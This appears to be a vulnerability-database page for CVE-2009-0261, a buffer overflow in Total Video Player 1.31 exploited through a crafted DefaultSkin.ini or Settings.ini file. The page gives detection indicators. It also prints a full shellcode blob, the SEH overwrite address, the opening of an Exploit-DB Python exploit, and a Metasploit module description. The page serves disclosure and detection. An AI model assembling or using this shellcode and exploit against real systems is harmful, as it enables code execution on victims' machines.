CVE-2009-0261
published 2009-01-23CVE-2009-0261: Stack-based buffer overflow in EffectMatrix Total Video Player 1.31 allows user-assisted attackers to execute arbitrary code via a…
PriorityP343critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
13.21%
95.9th percentile
Stack-based buffer overflow in EffectMatrix Total Video Player 1.31 allows user-assisted attackers to execute arbitrary code via a Skins\DefaultSkin\DefaultSkin.ini file with a large ColumnHeaderSpan value.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| effectmatrix | total_video_player | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd5\xc5\x35\xef\x83\xeb\xfc\xe2\xf4\x29\x2d\x71\xef\xd5\xc5\xbe\xaa\xe9\x4e\x49\xea\xad\xc4\xda\x64\x9a\xdd\xbe\xb0\xf5\xc4\xde\xa6\x5e\xf1\xbe\xee\x3b\xf4\xf5\x76\x79\x41\xf5\x9b\xd2\x04\xff\xe2\xd4\x07\xde\x1b\xee\x91\x11\xeb\xa0\x20\xbe\xb0\xf1\xc4\xde\x89\x5e\xc9\x7e\x64\x8a\xd9\x34\x04\x5e\xd9\xbe\xee\x3e\x4c\x69\xcb\xd1\x06\x04\x2f\xb1\x4e\x75\xdf\x50\x05\x4d\xe3\x5e\x85\x39\x64\xa5\xd9\x98\x64\xbd\xcd\xde\xe6\x5e\x45\x85\xef\xd5\xc5\xbe\x87\xe9\x9a\x04\x19\xb5\x93\xbc\x17\x56\x05\x4e\xbf\xbd\x35\xbf\xeb\x8a\xad\xad\x11\x5f\xcb\x62\x10\x32\xa6\x54\x83\xb6\xc5\x35\xef
bytes↗
\x7C\xE1\xA7\x7C
- →Trigger condition is a large `ColumnHeaderSpan` value in the INI file; look for abnormally long (>221 bytes) ColumnHeaderSpan field in DefaultSkin.ini or Settings.ini ↗
- →Exploit buffer structure: 221 bytes of 0x41 padding followed by SEH overwrite address 0x7CA7E17C; detect this byte pattern in INI files opened by Total Video Player ↗
- →Exploit is a SEH-based buffer overflow (EXITFUNC=seh); monitor for SEH chain corruption in Total Video Player process (TVPlayer.exe or similar) when parsing INI files ↗
- →NOP sled of 20 bytes (0x90) precedes shellcode; presence of NOP sled + shellcode blob in a .ini file is a strong indicator of exploitation attempt ↗
- ·The exploit was tested on Windows XP Pro SP2, Windows XP SP3, Windows 7, and Windows 8; the hardcoded SEH overwrite address (0x7CA7E17C) is platform/module-specific and may not apply to all OS versions ↗
- ·The vulnerability is user-assisted (local file format exploit); exploitation requires the victim to open a maliciously crafted DefaultSkin.ini or Settings.ini file with Total Video Player 1.31 ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Total Video Player 1.31 - 'DefaultSkin.ini' Local Stack Overflow
exploitdb·2009-01-20
CVE-2009-0261 Total Video Player 1.31 - 'DefaultSkin.ini' Local Stack Overflow
Total Video Player 1.31 - 'DefaultSkin.ini' Local Stack Overflow
---
#!/usr/bin/python
import socket
print "******************************************************"
print " Total Video Player V1.31 Local Stack Overflow\n"
print " Author: His0k4"
print " Tested on: Windows XP Pro SP2 Fr\n"
print " Greetings to:"
print " All friends & muslims HaCkers(dz)\n"
print " dz-secure.com\n snakespc.com\n dz-security.net"
print "******************************************************"
header1 = (
"\x5B\x57\x69\x6E\x64\x6F\x77\x73\x5D\x0A\x50\x6C\x69\x73\x74\x57"
"\x69\x6E\x64\x6F\x77\x20\x3D\x20\x70\x6C\x73\x2E\x64\x6C\x6C\x2C"
"\x49\x44\x0A\x0A\x5B\x4D\x61\x69\x6E\x57\x69\x6E\x64\x6F\x77\x53"
"\x43\x52\x45\x45\x4E\x5D\x4D\x61\x69\x6E\x3D\x4E\x6F\x72\x6D\x61"
"\x6C\x2E\x62\x6D\x70\x0A\x0A\x5B\x50\x6C
Metasploit
Total Video Player 1.3.1 (Settings.ini) - SEH Buffer Overflow
metasploit
Total Video Player 1.3.1 (Settings.ini) - SEH Buffer Overflow
Total Video Player 1.3.1 (Settings.ini) - SEH Buffer Overflow
This module exploits a buffer overflow in Total Video Player 1.3.1. The vulnerability occurs opening malformed Settings.ini file e.g. "C:\Program Files\Total Video Player\". This module has been tested successfully on Windows WinXp-Sp3-EN, Windows 7, and Windows 8.
No writeups or analysis indexed.
2009-01-23
Published